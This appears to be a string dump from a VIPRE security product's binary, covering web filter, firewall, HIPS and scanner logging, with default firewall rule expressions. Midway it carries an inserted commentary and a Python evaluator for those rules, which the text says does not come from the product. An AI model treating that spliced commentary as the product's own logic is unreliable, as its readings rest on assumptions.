OpenProcess failed for PID %d. Cannot run the command as a logged on user.
Trying to launch <%s> for user u <%u>.
Only handling the first %u users.
%u users found.
explorer.exe
CmdLine = <%s>.
ISBWebFilterEvents
CProxy_ISBWebFilterEvents<class CSBWebFilter>::Fire_ConfigChangeCB
CProxy_ISBWebFilterEvents<class CSBWebFilter>::Fire_WebFilterStateChangeCB
CProxy_ISBWebFilterEvents<class CSBWebFilter>::Fire_WebFilterStatsCB
CProxy_ISBWebFilterEvents<class CSBWebFilter>::Fire_WebFilterPublishingCB
CProxy_ISBWebFilterEvents<class CSBWebFilter>::Fire_WebFilterReportingCB
#SBWebFilter
Web Filter CoClass
CSBWebFilter::GetConfig
CSBWebFilter::SetConfig
WebFilterStatus is NULL
CSBWebFilter::GetWebFilterStatus
CSBWebFilter::EnableWebFilter
CSBWebFilter::DisableWebFilter
CSBWebFilter::WFResetToDefaults
CSBWebFilter::OnConfigChangeEvent
CSBWebFilter::OnWebFilterStateChangeEvent
CSBWebFilter::OnWebFilterStatsEvent
CSBWebFilter::OnPublishingEvent
CSBWebFilter::OnReportingEvent
CSBWebFilterImpl::StopThread
CSBWebFilterImpl::SetCoClassPtr
Failed to add the Port to the WebFilter collection. This Port will not be available.
Failed to clear the Ports in the WebFilter. The Ports collection could not be loaded in the WebFilter.
The Dirty flag is set for the Ports collection in the WebFilter Config file. The Ports collection will be reloaded in the WebFilter.
ApplyConfigPorts
The Dirty Flag was not set on the Ports Collection from the WebFilter Config file. Will NOT update the Ports settings in the WebFilter.
CSBWebFilterImpl::GetWebFilterStatus
This is a Firewall SKU and this function requires the WebFilter SDK, but WebFilter dll is not loaded! Unable to proceed.
SbWF:WebFilter
Event received from WebFilter module; adding to event queue
CSBWebFilterImpl::NotificationCB
Stats received from WebFilter module; adding to stats queue
CSBWebFilterImpl::StatsCB
Resetting all Web Filter settings back to the defaults for VIPRE Premium SKU.
Resetting all Web Filter settings back to the default settings for Enterprise SKU.
CSBWebFilterImpl::ResetDefaultSiteValues
Resetting all Web Filter settings back to the default settings for (%s) mode.
Unknown:%d
SbWebFilter.dll
WebFilterConfig.xml
CSBWebFilterImpl::SetDefaultConfigValues
Config file may not exist or is corrupted. Creating default config file for the Webfilter controller.
Web filter notification callback didn't include valid data pointer.
staticUrlInspectionCB
Web filter notification callback didn't include valid context pointer.
Web filter stats callback didn't include valid data pointer.
Web filter stats callback didn't include valid context pointer.
Failed to add the BadUrlBlockingException (%s) to the KnownGoodDomain collection. This BadUrlBlockingException will not be available.
The Dirty flag is set for the BadUrlBlockingExceptions collection in the WebFilter Config file. The BadUrlBlockingExceptions collection will be reloaded in the WebFilter.
ApplyConfigBadUrlBlockingExceptions
The Dirty Flag was not set on the BadUrlBlockingExceptions Collection from the WebFilter Config file. Will NOT update the BadUrlBlockingExceptions settings in the WebFilter.
Failed to add the UserKnownBadUrl (%s) to the KnownBadDomain collection. This UserKnownBadUrl will not be available.
The Dirty flag is set for the UserKnownBadUrls collection in the WebFilter Config file. The UserKnownBadUrls collection will be reloaded in the WebFilter.
ApplyConfigUserKnownBadUrls
The Dirty Flag was not set on the UserKnownBadUrls Collection from the WebFilter Config file. Will NOT update the UserKnownBadUrls settings in the WebFilter.
Updated WebFilter Info system configuration.
CSBWebFilterImpl::UpdateInfoConfig
SbWFInfo_UpdateConfig failed. Unable to update Web Filter Info system configuration, statistics may not be reported correctly.
SbWF_UpdateConfig failed. The WebFilter configuration was not correctly updated. The WebFilter may not function as expected.
Called SbWF_SetBlockPage(SbWF_BlockPage_BadUrl) with path (%s). The WebFilter will now use the blocked web page html.
CSBWebFilterImpl::LoadBlockPages
SbWF_SetBlockPage(SbWF_BlockPage_BadUrl) failed with path (%s). The WebFilter will not use the blocked web page html.
BlockedWebPage.htm
SbWF_Stop failed. The WebFilter may not function as expected.
CSBWebFilterImpl::StopWebFilter
SbWFInfo_Stop failed. The WebFilter may not function as expected.
Web Filter controller stopped.
CSBWebFilterImpl::StopController
WebFilter dll is not loaded!
the Webfilter config file
CSBWebFilterImpl::SaveConfigToDisk
the default webfilter config file
the webfilter config file
CSBWebFilterImpl::GetConfigObjectFromDisk
SbWFInfo_Start failed. Unable to start WebFilter.
Unable to read WebFilter Config information. Unable to start WebFilter.
CSBWebFilterImpl::StartWebFilter
SbWF_Start failed. Unable to start WebFilter.
CSBWebFilterImpl::ResetInfoConfig
Unable to read WebFilter Config information. Unable to reset the WebFilter Info Stats Update Frequency.
Out. WebFilter status = %u
Calling OnWebFilterStateChangeEvent().
WebFilter is already stopped.
Failed to stop the WebFilter.
Stopped the WebFilter.
The config file says to turn OFF the WebFilter.
UpdateInfoConfig failed. The WebFilter Info System frequency configuration was not correctly updated. The WebFilter may not report statistics as expected.
WebFilter is already running.
Failed to start the WebFilter.
Started the WebFilter.
The config file says to turn ON the WebFilter.
In. WebFilter status = %u
CSBWebFilterImpl::ApplyConfig
SbWF_SetLoggerCallback failed. Unable to configure WebFilter logging callback.
Resetting all Web Filter settings, user defined Ad Rules and predefined web sites back to the default settings.
CSBWebFilterImpl::WFResetToDefaults
Unable to read WebFilter Config information can't %s the WebFilter.
CSBWebFilterImpl::EnableWebFilter
the webfilter config object
CSBWebFilterImpl::GetConfig
CSBWebFilterImpl::SetConfig
Failed to get webfilter config object from disk; webfilter settings will not be updated
Failed to apply webfilter config settings; webfilter settings may be in an inconsistent state
Successfully applied webfilter config settings
Successfully loaded webfilter config from disk; applying its settings
CSBWebFilterImpl::DoConfigThread
Invalid hour %u. There are only 24 hours in a day. Did not accumulate webfilter statistics.
%Y-%m-%dT00:00:00
%s\%sWS_%s.xml
%Y%m%d
Couldn't add to %s. Folder is NULL.
web filter hourly stats file
WebFilter Stats XML
No listeners for Reporting event
Firing Reporting event
WebFilter event file
WF{%s}.xml
WebFilter Event XML
CSBWebFilterImpl::WebFilterThread
Failed starting the thread. Web filtering will not be operational.
CSBWebFilterImpl::StartThread
WebFilter dll successfully loaded
Could not load WebFilter dll; controller not started.
CSBWebFilterImpl::StartController
CProxy_ISBFirewallEvents<class CSBFirewall>::Fire_FWReportingCB
CSBFirewall::OnReportingEvent
Unknown event type in callback type = (%d)
Callback type = (%d) %s.
Packet To Unopened Port event type
SbFweIds_DeleteUserIDSRule for ID [%d] returned [%d]. Unable to delete user IDS rule.
Failed to add the Application Rule for [%s] to the firewall collection. This Rule will not be loaded into the Firewall.
Failed to add the Network rule (%s) to the firewall collection. This rule will not be loaded into the Firewall.
Failed to add the gateway address %s (%s) to the firewall collection. The gateway collection will not be loaded into the Firewall.
Failed to add the Zone (%s) to the firewall collection. The Zones collection will not be loaded into the Firewall.
Invalid or unknown Address type for zone (%s). This zone will not have any Address Addresses.
Product version %s
Dequeued the data object for dispatch for msgId %s. EventDispatcherThread did not handle this.
Event signaled 0xX. Received the data dequeue for msgId %s.
Timeout while waiting for the data dequeue event 0xX for msgId %s.
Error while waiting for the data dequeue event 0xX for msgId %s. Wait result: %u.
Waiting for data dequeue event 0xX for msgId %s.
Failed to signal the dispatch event 0xX for msgId %s. Not notifying the user.
Signaling the dispatch event 0xX for msgId %s.
Queued the data object for dispatch for msgId %s.
Failed to signal the dispatch event 0xX for msgId %s. Not reporting to the user.
Failed to create EventData object. Unable to process the Report Callback.
There is no dispatch event. Cannot report to the user.
CSBFirewallImpl::ReportCB
Network event report callback didn't include valid data pointer.
Threat Def version %s
Threat Def version %d, release date %s
Firewall event Report callback.
staticReportCB
Network event report callback didn't include valid context pointer.
Failed to add the firewall filter rule--id <%d> application <%s> description <%s>. This rule will not be available.
Unable to allocate the RemotePorts array from the Firewall Config file. The RemotePorts collection was not be loaded into the Firewall.
Unable to allocate the LocalPorts array from the Firewall Config file. The LocalPorts collection was not be loaded into the Firewall.
Setting Basic Firewall default IDS Rules to the settings for (%s) mode.
Setting Basic Firewall default Network Rules to the settings for (%s) mode.
sbagentdiagnostictool.exe
winlogon.exe
lsass.exe
sbamsvc.exe
Setting Basic Firewall default Application Rules to the settings for (%s) mode.
Setting Basic Firewall settings back to the settings for (%s) mode.
direc=out & (proto=TCP | proto=UDP) & (rport=137 | rport=138 | rport=139 | rport=445)
direc=in & (proto=TCP | proto=UDP) & (lport=137 | lport=138 | lport=139 | lport=445)
(proto=UDP & rport=88 & direc=out)
(proto=UDP & lport=88 & direc=in)
(proto=TCP | proto=UDP) & (rport=389 | rport=636) & direc=out
(proto=TCP | proto=UDP) & (lport=389 | lport=636) & direc=in
(direc=out & proto=47) | (proto=TCP & rport=1723 & direc=out) | (direc=out & proto=50) | (direc=out & proto=108)
(direc=in & proto=47) | (proto=TCP & lport=1723 & direc=in) | (direc=in & proto=50) | (direc=in & proto=108)
proto=UDP & rport=53 & direc=out
proto=UDP & lport=53 & direc=in
((lport=68 & rport=67) | (lport=67 & rport=68)) & proto=UDP & direc=out
((rport=68 & lport=67) | (rport=67 & lport=68)) & proto=UDP & direc=in
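The twelve strings above are the firewall's built-in network rules, written in a small boolean language: `field=value` atoms joined by `&` and `|`, grouped with parentheses, over the fields `direc`, `proto`, `lport` and `rport`. Judging by the port and protocol numbers they cover NetBIOS/SMB (137-139, 445), Kerberos (88), LDAP/LDAPS (389, 636), VPN transports (GRE 47, PPTP 1723, ESP 50, IPComp 108), DNS (53) and DHCP (67/68), each as an outbound and an inbound pair. The Python below is an added example, not code from the report or from the product's own engine: a recursive-descent evaluator that runs the outbound rule strings, copied verbatim, against constructed packet summaries. It assumes `&` binds tighter than `|` (every rule on the page parenthesises mixed operators, so the choice never changes their result), that `lport`/`rport` mean local/remote port, and that `TCP`/`UDP` stand for IANA protocol numbers 6 and 17 while numeric `proto` values are literal; the rule labels are mine.

```python
import re
from dataclasses import dataclass

# Rule strings copied verbatim from the dump above; labels are my own reading
# of the port/protocol numbers, not names that appear on the page.
RULES = {
    "NetBIOS/SMB out": "direc=out & (proto=TCP | proto=UDP) & (rport=137 | rport=138 | rport=139 | rport=445)",
    "NetBIOS/SMB in": "direc=in & (proto=TCP | proto=UDP) & (lport=137 | lport=138 | lport=139 | lport=445)",
    "Kerberos out": "(proto=UDP & rport=88 & direc=out)",
    "LDAP out": "(proto=TCP | proto=UDP) & (rport=389 | rport=636) & direc=out",
    "VPN out": "(direc=out & proto=47) | (proto=TCP & rport=1723 & direc=out) | (direc=out & proto=50) | (direc=out & proto=108)",
    "DNS out": "proto=UDP & rport=53 & direc=out",
    "DHCP out": "((lport=68 & rport=67) | (lport=67 & rport=68)) & proto=UDP & direc=out",
}

# Assumed: names map to IANA protocol numbers, numeric values are literal.
PROTO_NUMBERS = {"TCP": 6, "UDP": 17}


@dataclass(frozen=True)
class Packet:
    """Constructed packet summary; lport/rport = local/remote port (assumed)."""
    direc: str          # "in" or "out"
    proto: int          # IP protocol number
    lport: int = 0
    rport: int = 0


TOKEN_RE = re.compile(r"\s*(\(|\)|&|\||[A-Za-z]+=[A-Za-z0-9]+)")


def tokenize(rule: str) -> list[str]:
    """Split a rule into parens, operators and field=value atoms."""
    tokens, pos, rule = [], 0, rule.strip()
    while pos < len(rule):
        m = TOKEN_RE.match(rule, pos)
        if not m:
            raise ValueError(f"bad token at offset {pos}: {rule[pos:]!r}")
        tokens.append(m.group(1))
        pos = m.end()
    return tokens


def proto_number(raw: str) -> int:
    if raw.isalpha():
        if raw.upper() not in PROTO_NUMBERS:
            raise ValueError(f"unknown protocol name {raw!r}")
        return PROTO_NUMBERS[raw.upper()]
    return int(raw)


class RuleMatcher:
    """expr := term ('|' term)*   term := factor ('&' factor)*
    factor := '(' expr ')' | field=value   ('&' over '|' is assumed).
    Both operands of every operator are evaluated so malformed rules always raise."""

    def __init__(self, rule: str):
        self.tokens = tokenize(rule)
        self.pos = 0

    def matches(self, pkt: Packet) -> bool:
        self.pos = 0
        result = self._expr(pkt)
        if self.pos != len(self.tokens):
            raise ValueError(f"trailing tokens: {self.tokens[self.pos:]}")
        return result

    def _peek(self):
        return self.tokens[self.pos] if self.pos < len(self.tokens) else None

    def _take(self) -> str:
        if self.pos >= len(self.tokens):
            raise ValueError("unexpected end of rule")
        tok = self.tokens[self.pos]
        self.pos += 1
        return tok

    def _expr(self, pkt: Packet) -> bool:
        value = self._term(pkt)
        while self._peek() == "|":
            self._take()
            value = self._term(pkt) or value
        return value

    def _term(self, pkt: Packet) -> bool:
        value = self._factor(pkt)
        while self._peek() == "&":
            self._take()
            value = self._factor(pkt) and value
        return value

    def _factor(self, pkt: Packet) -> bool:
        tok = self._take()
        if tok == "(":
            value = self._expr(pkt)
            if self._take() != ")":
                raise ValueError("expected ')'")
            return value
        key, _, raw = tok.partition("=")
        if key == "direc":
            return pkt.direc == raw
        if key == "proto":
            return pkt.proto == proto_number(raw)
        if key in ("lport", "rport"):
            return getattr(pkt, key) == int(raw)
        raise ValueError(f"unknown field {key!r}")


MATCHERS = {label: RuleMatcher(rule) for label, rule in RULES.items()}


def matching_rules(pkt: Packet) -> list[str]:
    """Labels of every rule above that admits the packet, in page order."""
    return [label for label, m in MATCHERS.items() if m.matches(pkt)]


if __name__ == "__main__":
    for pkt in (Packet("out", 6, lport=51000, rport=445), Packet("out", 17, rport=53), Packet("in", 6, lport=80)):
        print(pkt, "->", matching_rules(pkt))
```

Because every rule is only a predicate over direction, protocol and ports, the evaluator is enough to answer the practical question these defaults raise: which of the allow rules an observed flow would fall under, for instance that an outbound TCP/445 connection is admitted by the NetBIOS/SMB rule regardless of destination, since none of the rules constrain addresses.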
Ping and Tracert
Failed to signal the dispatch event (0xX).
Signaling the dispatch event 0xX.
kSbFwe.dll
Unable to create a blank app rule in the config object. Not setting the app rule for svchost.exe.
%WINDIR%\system32\svchost.exe
Unable to create a blank app rule in the config object. Not setting the app rule for winlogon.exe.
%WINDIR%\system32\winlogon.exe
Unable to create a blank app rule in the config object. Not setting the app rule for services.exe.
%WINDIR%\system32\services.exe
Unable to create a blank app rule in the config object. Not setting the app rule for lsass.exe.
%WINDIR%\system32\lsass.exe
%PROGRAMFILES%\Internet Explorer\iexplore.exe
SBPIMSvc.EXE
SBAgentDiagnosticTool.EXE
SBAMUI.EXE
SBAMSvc.EXE
Resetting all Basic Firewall settings back to the default settings for (%s) mode.
FirewallConfig.xml
FW SDK Version "%s"
%u.%u.%u
SbFwe_GetVersion returned SDK %u.%u.%u IDS %u.%u.%u
Loaded the Event Object for %s data from firewall.
Packet To Unopened Port Event.
SbFweInfo_UpdateConfig failed. Unable to update Firewall Info system configuration, statistics may not be reported correctly.
Failed to add the Disabled IDS Rule [%d] in the firewall. This rule will not be available.
Failed to update the Rules Path (%s). The Firewall may not be able to locate the correct Rules files.
SbFwe_EnableFilterRules failed. Filter Rules may not be (%s) as expected.
SbFwe_EnableNetworkRules failed. Network Rules may not be (%s) as expected.
SbFwe_EnableApplicationRules failed. Appplication Rules may not be (%s) as expected.
Failed to update the LogPacketsToUnopenedPorts setting. Packets To Unopened Ports may not be logged correctly.
Failed to update the Log Port Scans setting. Port Scan may not be logged correctly.
SbFweIds_Start failed. Unable to start IDS because the IDS system didn't have all the required data. Most likely the IDSRules.dat file is missing.
Unable to read Firewall Config information can't %s the Basic Firewall.
Updated HIPS Config information to %s the Firewall HIPS controller.
Updated WebFilter Config information to %s the Firewall WebFilter controller.
Updated Firewall Config information to %s the Firewall controller.
Failed to allocate the buffer for (%d) IDS items. Unable to read Firewall IDS Rules information.
SbFweIds_CreateUserIDSRule returned [%d]. Unable to create user IDS rule.
SbFweIds_UpdateUserIDSRule returned [%d]. Unable to create user IDS rule.
Called SbFweIds_GetDefinitionsRules with path (%s). The Firewall will now use the updated definition rules.
SbFweIds_GetDefinitionsRules failed with path (%s). The Firewall will not use the updated definition rules.
\idsrules.dat
No such data object stored for msgId %s. Cannot remove nor destroy the data object.
Removed the data object from the map for msgId %s.
Event signaled 0xX. Received the prompt answer for msgId %s. Returning answer in Result back to FW SDK.
Timeout while waiting for the prompt answer event 0xX for msgId %s. Allowing.
Error while waiting for the prompt answer event 0xX for msgId %s. Wait result %u.
Waiting for prompt answer event 0xX for msgId %s.
Event signaled 0xX. Received the prompt ACK for msgId %s. Prompt is being displayed to the user.
Timeout while waiting for the prompt ACK event 0xX for msgId %s. Maybe no clients. Allowing.
Error while waiting for the prompt ACK event 0xX for msgId %s. Wait result: %u.
Waiting for prompt ACK event 0xX for msgId %s.
Timeout while waiting for the data dequeue event 0xX for msgId %s. Allowing.
Failed to signal the dispatch event 0xX for msgId %s. Allowing.
Stored the data object in the map for msgId %s.
Prompt for outbound traffic for the any other app rule for known good app (%s); allow the event instead of prompting.
An error occurred trying to updated rule information in the config file for Rule Id (%d) from event related to application (%s).
Updated rule information saved in the config object for Rule Id (%d) from event related to application (%s).
Found an existing rule for application [%s] in the config object. Only changing the action enum for the application.
No existing Network or Application rule found for RuleID [%d], application [%s]. Creating a new Application rule with ID [%d].
Found an existing network rule for rule id [%d] in the config object. Only changing the action enum for the network rule.
We need to create rule for Rule ID [%d] related to application (%s).
Received a request to disable a rule for a (%s) event type.
Unable to read Firewall Config. Not able to disable the rule (ID %d).
Unable to create a new DisabledDefinitionIDSRule in the config object. DisabledDefinitionIDSRule for Rule Id (%d) was not saved to the config file.
Error saving the Firewall Config file. DisabledDefinitionIDSRule for Rule Id (%d) was not saved to the config file.
Found an existing DisabledDefinitionIDSRule for rule [%d] in the config object. No need to disable the rule.
DisabledDefinitionIDSRule saved in the config object for Rule Id (%d).
No existing DisabledDefinitionIDSRule found for rule [%d]. Creating a new DisabledDefinitionIDSRule.
Expecting an adapter event, but received a %s event. Not adding adapter or zone.
Unable to read Firewall Config. Not adding the adapter or zone to the collection for adapter (ID %s).
Unable to create a blank zone in the config object for adapter (ID %s). Not saving the added adapter.
Zone not found in config object for adapter (ID %s). Adding a new zone to the collection.
Unable to create a blank adapter (ID %s) in the config object. Not adding zone either.
Adapter not found in config object. Adding a new adapter (ID %s) to the collection.
Adapter found in config object for adapter (ID %s).
Received a request to disable the notifications for (%s) event type.
Unknown request enum (%d). Cannot figure out request.
Received a request from a client in response to a Firewall event, but we are unable to serialize the event xml data.Cannot figure out request.
sbpimsvc.exe
sbamui.exe
Added default application rule for SBAgentDiagnosticTool.EXE to firewall configuration.
Invalid hour %u. There are only 24 hours in a day. Did not accumulate network statistics.
%s\%sNS_%s.xml
network hourly stats file
Invalid hour %u. There are only 24 hours in a day. Did not accumulate IDS statistics.
%s\%sIS_%s.xml
IDS hourly stats file
Invalid hour %u. There are only 24 hours in a day. Did not accumulate Filter statistics.
%s\%sFS_%s.xml
Filter hourly stats file
More items on the event dispatch queue so NOT resetting the dispatch event. Keep processing more messages until the queue is empty. Queue size = %d.
Failed to reset the event dispatch event (0xX).
Resetting the dispatch event because the queue is empty. This will allow this thread to wait for the next event. Queue size = %d.
Finished processing the event and determining if we need to reset the dispatch event. Only reset it if the queue is empty. Queue size = %d.
No listeners for Reporting event for msgId %s. The COM event to notify any interested client apps of a firewall report event was NOT fired.
Calling OnReportingEvent() for msgId %s. This is the COM event to notify any interested client apps of a firewall report event.
%s\%s%s.xml
Invalid or unknown ClientRuleData value for event type (%s). Unable to determine which list of event files to pass to ManageEventFiles.
%s%s.xml
FWPORT
No client apps listening for Publishing event for msgId %s. The user will not receive any pop up for this event.
Calling OnPublishingEvent() for msgId %s. The COM event is being fired to alert any listening clients of the event that is ready for publishing.
Failed to signal the data dequeued event 0xX for msgId %s.
Event signaled, handle = 0xX. Dequeued and dispatching the queued firewall event for msgId %s. Signaling the data dequeued event so the firewall SDK callback can return, handle = 0xX.
While dequeueing the data object for dispatch for msgId %s, found an uknown event type (%d). Whatever event caused this to occur is discarded.
Failed to reset the stats dispatch event (0xX).
Event signaled 0xX. Dispatch the queued firewall stats.
Error while waiting for dispatch event 0xX. Wait result: %u.
Waiting for dispatch event 0xX and 0xX.
Out. Firewall status = %u
In. Firewall status = %u
Failed to signal the prompt answer event 0xX for msgId %s.
Signaling the prompt answer event 0xX for msgId %s.
No such data object stored for msgId %s. Not found. Not sending the answer to the prompt to the Firewall SDK.
No such data object stored for msgId %s. iter->second was NULL. Not sending the answer to the prompt to the Firewall SDK.
Saving the prompt answer for msgId %s in the map.
Received prompt answer for msgId %s.
Failed to signal prompt ACK event 0xX for msgId %s.
Signaling prompt ACK event 0xX for msgId %s.
No such data object queued for msgId %s. Not found. Not signaling prompt ACK.
No such data object stored for msgId %s. iter->second was NULL. Not signaling prompt ACK.
Received prompt ACK for msgId %s.
Failed starting the event dispatcher thread. Firewall will not be operational.
Failed creating the dispatch the firewall stats...event. Event dispatcher thread start failed.
Failed creating the dispatch the firewall event...event. Event dispatcher thread start failed.
This %s a Firewall SKU and the Firewall dll was successfully loaded.
This %s a Firewall SKU but we could not load Firewall dll, the controller will not be started.
Unable to get the Enterprise Agent (%s) start function (%s) address. Unable to stop the Enterprise Agent.
Enterprise Agent (%s) start function (%s) returned %s.
Calling the Enterprise Agent (%s) start function (%s).
SBEAgent.dll
Unable to get the Enterprise Agent (%s) stop function (%s) address. Unable to stop the Enterprise Agent.
Calling the Enterprise Agent (%s) stop function (%s).
Unable to get the Enterprise Agent (%s) reset firwall function (%s) address. Unable to reset the firewall.
Calling the Enterprise Agent (%s) reset firewall to policy function (%s).
CProxy_ISBHIPSEvents<class CSBHIPS>::Fire_HIPSReportingCB
CSBHIPS::OnReportingEvent
Unexpected result=<%d> waiting for worker thread to stop; worker thread will be terminated
Resetting all HIPS settings back to the default settings for (%s) mode.
HIPSConfig.xml
Added program=<%s>, md5=<%s>, authority=<%s>, protection=<%s>
Failed to add program=<%s>, md5=<%s>, authority=<%s>, protection=<%s>
Couldn't compute the MD5 for program=<%s> with authority=<%s>; error=<%d>. May not be able to add it to HIPS.
ApplyConfig %s; PrevState=<%s>, State=<%s>
Unable to read HIPS Config information can't %s the Firewall HIPS.
Invalid hour %u. There are only 24 hours in a day. Did not accumulate HIPS statistics.
%s\%sHS_%s.xml
hips hourly stats file
Processed %d event(s) from the queue
There was an error adding to the HIPS Hourly Stats buckets. This HIPS event may not have been added to the stats correctly.
No listeners for Publishing/Reporting events
Firing Publishing/Reporting events
HIPS{%s}.xml
Unexpected result=<%d> waiting for controller events; ignore it
Got current thread state <%d> and reboot <%d> statuses.
Boot time scanner REGISTRATION <%s>.
Boot time scanner UNREGISTRATION <%s>.
Couldn't get boot time scanner status. Operation failed.
Current boot time scanner registration status is <%s>.
Threat engine returned an unsupported state: %d. Scan state event won't fire event to subscribed clients.
Scan thread change to <%d> state.
Failed scanning file <%s>. Didn't get any result.
File <%s> has threat id <%d> (0 - not a threat).
File <%s> %s good.
Invalid source buffer pointer or length. Write file operation failed.
Couldn't open file on path <%s>. Write file operation failed.
Failed writing data into file path <%s>. Write file operation failed.
Unexpected length <%d> written into file pat <%s>. Write file operation failed, file incomplete.
Data completely written into file <%s>.
File successfully opened on path <%s> to write data.
Couldn't open file path <%s>. Couldn't read file.
Read data of length <%d> from file on path <%s>.
Failed reading data from file on path <%s>. Couldn't read file.
Failed reading BOM from file path <%s>. Couldn't read file.
Successfully retrieved file length <%d>.
File successfully opened on path <%s> to read data.
Invalid file length <%s>. Couldn't read file.
Last successful scan results path generated <%s>.
Couldn't get signature for file <%s> from threat engine.
Threat Engine returned (%s) signature for file <%s> from threat engine.
Failed to purge history because this is an unknown history type %d.
File <%s> deleted since it's older than <%d> days.
Could not delete file on path <%s>. Search for the next history file.
Delete history events for (%s) older than <%d> days.
SW*.xml
LG*.xml
FWCHG*.xml
FWPUP*.xml
FWADP*.xml
FWIDS*.xml
FWADV*.xml
FWNET*.xml
Port Events
FWPORT*.xml
FWAPP*.xml
HIPS*.xml
FW*.xml
Web Filter Events
WF*.xml
FW Hourly Stats
*.xml
Deleting quarantine items older than <%d> days.
EV*.xml
EM*.xml
2*.xml
Delete is enabled. HistoryType=[%d]
Delete is disabled. HistoryType=[%d]
Firing the cleaner control <%s> using <%s> as the input file.
Cleaner input file moved from <%s> to <%s>.
Failed copying file from <%s> to <%s>. Cleaning operatation won't proceed.
Got input scan results file name the cleaner will use <%s>.
Checking for a user known entity [%s] and signature [%s].
Unknown trace type detected iuTraceType=[%d].
Scan thread resumed to previous <%d> state.
Non-cookie trace from <%s> was deleted or quarantined. Send it to threat net.
Cleaner results <%s> didn't meet criteria. File NOT sent to threat net.
Got trace <%s> of threat <%s> from <%s>. Test if there are non-cookie threats deleted or quarantined.
Got threat <%s> from <%s>. Test if there are non-cookie threats deleted or quarantined.
Threats from <%s> were quarantined or deleted. Proceed calculating criteria.
Successfully got cleaner results summary from <%s>. Proceed calculating criteria.
Couldn't deserialize scan results <%s>. Clean ends and thread waits for next event.
Cleaner results <%s> %s meet deep after quick criteria.
Got trace <%s> of threat <%s> from <%s>. Test if there are non-cookie threats.
Got threat <%s> level [%d] from <%s>. Test if there are non-cookie threats.
Threats from <%s> were detected. Proceed checking criteria.
Successfully got cleaner results summary from <%s>. Proceed checking deep after quick criteria.
Couldn't deserialize scan results <%s>. Thread waits for next event.
Scan results criteria applied successfully to <%s>.
Couldn't apply scan results criteria successfully to <%s>. Clean ends and thread waits next event.
Wrote cleaner results file on path <%s> successfully.
Couldn't write clean results file on path <%s>. Clean ends and thread waits next event.
Got cleaner results lenght <%d> on path <%s>
Cleaner operation completed successfully.
Cleaner returns unknown state <%d>. Clean ends and thread waits for the next event.
Scan results data on path <%s> successfully read.
Couldn't read scan results data on path <%s>. Clean ends and thread waits for next event.
Got scan results file size of length <%d> on path <%s> successfully.
Coulnd't read scan results size on path <%s>. Clean ends and thread waits for next event.
Current clean input file on path <%s>.
CSBScanControlImpl::ExecuteCleaner
Couldn't serialize default scan config file on path <%s>. Serialize operation failed.
Threat engine max <%d> and min <%d> file lengths.
Default quarantine folder path <%s>.
Default system events folder path <%s>.
Default history folder path <%s>.
Couldn't serialize scan config file path <%s>. Config file may not exist or is corrupted, it will try to create a default scan config file. Will try to create a default scan config file.
ScanConfig.xml
Scan type <%d> %s found.
Couldn't get scan config object. Operation failed.
Adding the randomized scheduled definitions update before the next scheduled scan for (%s) failed. Scheduled update before the next scheduled scan will not occur.
d:d
Randomized the scheduled definitions update before the next scheduled scan by [%d] seconds to (%s).
Current time is (%s).
Couldn't get application data folder <%s>. Unable to convert any user knowns by signature, crc8 to fullpath.
Couldn't find scan schedule <%d>; unable to determine scan type.
Scan configuration name <%d> is invalid OR empty. Scan thread won't start a scan.
Scan config <%d> is valid. Scan thread is starting a scan now.
Couldn't delete Social Watch history older than [%d] days. Wait for the next event.
Couldn't delete System Update Scan history older than [%d] days. Wait for the next event.
Couldn't delete hips event files older than [%d] days. Wait for the next event.
Couldn't delete webfilter event files older than [%d] days. Wait for the next event.
Couldn't delete firewall event files older than [%d] days. Wait for the next event.
Couldn't delete firewall stats files older than [%d] days. Wait for the next event.
Couldn't delete quarantined files older than [%d] days. Wait for the next event.
Couldn't delete system events events older than [%d] days. Wait for the next event.
Couldn't delete EmailAV events older than [%d] days. Wait for the next event.
Couldn't delete AP events older than [%d] days. Wait for the next event.
Couldn't delete Scan history older than [%d] days. Wait for the next event.
Couldn't set scheduled scan <%s> for scan type <%d>. This scheduled scan will not happen.
Successfully set scheduled scan <%s> for scan type <%d>.
Invalid cleanerAction=<%d> (categoryName=<%s>, categoryId=<%d>). Threat category action was not pushed into the threat engine.
Threat categoryName=<%s>, categoryId=<%d>, and cleanerAction=<%d> added to threat engine.
Failed adding threat categoryName=<%s>, categoryId=<%d>, and cleanerAction=<%d> to threat engine. Threat category action was not pushed into the threat engine.
Invalid categoryId=<%d> (categoryName=<%s>, cleanerAction=<%d>). Threat category action was not pushed into the threat engine.
Couldn't add threat id to ignore list <%d>. One or more ignored threat was not pushed into the threat engine.
Threat id added to ignore list <%d>.
Failed setting SBCSEnableRootkitEngine <%d>. Value may be incorrect in the threat engine.
Failed setting SBCSSetLowRiskThreatDetection <%d>. Value may be incorrect in the threat engine.
Couldn't get application data folder <%s>. It won't set new content for scan config file.
Scan config data %ssaved.
Scan config data %s saved.
Saved current total scan elapsed time of <%u> seconds.
Add a user known entity [%s] of type %d to scan config. Item Type is %d.
Adding file [%s] to known good because MoveToAlwaysAllowed is true.
Removing known bad file [%s] from Always Blocked list.
Moving file [%s] from Always Blocked list to Always Allowed list.
Couldn't exclude path <%s> from scan. Leaving now.
Scan settings for type <%d> successfully applied to the threat engine.
User has invalid or expired registration state.Disabling the auto disposition.
Added path <%s> to scan.
Failed setting EnableFileCache to <%s>; scan will NOT use file cache.
Set EnableFileCache to <%s>; scan %s use file cache.
Set SBCS_OPT_SCAN_ROOTKITS to <%d>.
Failed setting SBCS_OPT_SCAN_ROOTKITS <%d>. Leaving now.
Set SBCS_OPT_SCAN_VIPRE_SUSPICIOUS to <%d>.
Failed setting SBCS_OPT_SCAN_VIPRE_SUSPICIOUS <%d>. Leaving now.
Set SBCS_OPT_SUSPEND_ACTIVE_THREATS to <%d>.
Failed setting SBCS_OPT_SUSPEND_ACTIVE_THREATS <%d>. Leaving now.
Set SBCS_OPT_SCAN_REGISTRY to <%d>.
Failed setting SBCS_OPT_SCAN_REGISTRY <%d>. Leaving now.
Set SBCS_OPT_SCAN_PROCESSES_DEEP to <%d>.
Failed setting SBCS_OPT_SCAN_PROCESSES_DEEP <%d>. Leaving now.
Set SBCS_OPT_SCAN_PROCESSES to <%d>.
Failed setting SBCS_OPT_SCAN_PROCESSES <%d>. Leaving now.
Set SBCS_OPT_SCAN_KNOWN_FILE_TYPES_ONLY to <%d>.
Failed setting SBCS_OPT_SCAN_KNOWN_FILE_TYPES_ONLY <%d>. Leaving now.
Set SBCS_OPT_SCAN_FILES to <%d>.
Failed setting SBCS_OPT_SCAN_FILES <%d>. Leaving now.
